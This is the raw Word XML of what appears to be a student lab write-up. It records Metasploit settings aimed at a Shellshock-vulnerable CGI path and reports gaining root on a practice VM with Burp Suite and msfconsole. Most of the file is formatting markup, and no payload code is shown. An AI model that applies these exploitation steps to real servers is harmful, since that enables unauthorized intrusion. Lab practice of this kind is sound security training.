          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2D55" w:rsidRDefault="001C2D55" w:rsidP="0037109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Show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="001C2D55" w:rsidP="005D729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Set TARGETURI /cgi-bin/status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRPr="005D729C" w:rsidRDefault="00D245AF" w:rsidP="005D729C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D245AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CE8BBAB" wp14:editId="788C3B79">
            <wp:extent cx="5943600" cy="1923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C" w:rsidRPr="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRPr="005D729C" w:rsidRDefault="00D245AF" w:rsidP="005D729C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The command gave me root access to shellshock VM by using both burp suite and msfconsole</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF1D0C" w:rsidRDefault="00AF1D0C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D729C" w:rsidRPr="005D729C" w:rsidRDefault="005D729C" w:rsidP="005D729C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005D729C" w:rsidRPr="005D7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AC6" w:rsidRDefault="008E3AC6" w:rsidP="007765AD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008E3AC6" w:rsidRDefault="008E3AC6" w:rsidP="0077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AC6" w:rsidRDefault="008E3AC6" w:rsidP="007765AD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008E3AC6" w:rsidRDefault="008E3AC6" w:rsidP="00776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56856"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E75C65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FF177E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50AAE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EA5784"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59A4479C"/>
    <w:lvl w:ilvl="0" w:tplc="E44A8B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8C"/>
    <w:rsid w:val="000050D6"/>
    <w:rsid w:val="000F5E16"/>
    <w:rsid w:val="001C2D55"/>
    <w:rsid w:val="001E13F2"/>
    <w:rsid w:val="00252D23"/>
    <w:rsid w:val="00301DE8"/>
    <w:rsid w:val="00371098"/>
    <w:rsid w:val="004623AE"/>
    <w:rsid w:val="00575D2F"/>
    <w:rsid w:val="0057629E"/>
    <w:rsid w:val="005D729C"/>
    <w:rsid w:val="0060629A"/>
    <w:rsid w:val="006351F6"/>
    <w:rsid w:val="00665D6E"/>
    <w:rsid w:val="00711738"/>
    <w:rsid w:val="007765AD"/>
    <w:rsid w:val="008E3AC6"/>
    <w:rsid w:val="00922468"/>
    <w:rsid w:val="009A3CF1"/>
    <w:rsid w:val="00A04353"/>
    <w:rsid w:val="00A07D7E"/>
    <w:rsid w:val="00AC500A"/>
    <w:rsid w:val="00AF1D0C"/>
    <w:rsid w:val="00BC4310"/>
    <w:rsid w:val="00C0744C"/>
    <w:rsid w:val="00CD3020"/>
    <w:rsid w:val="00D17031"/>
    <w:rsid w:val="00D245AF"/>
    <w:rsid w:val="00D300ED"/>
    <w:rsid w:val="00D92CAF"/>
    <w:rsid w:val="00DD178C"/>
    <w:rsid w:val="00DD7B33"/>
    <w:rsid w:val="00E210D5"/>
    <w:rsid w:val="00FB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5443"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{17B29CC7-9F95-4572-8136-187E3FF7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1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3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6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5AD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00776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5AD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00AF1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burp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6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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>NGALA</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-08T19:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-09T01:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>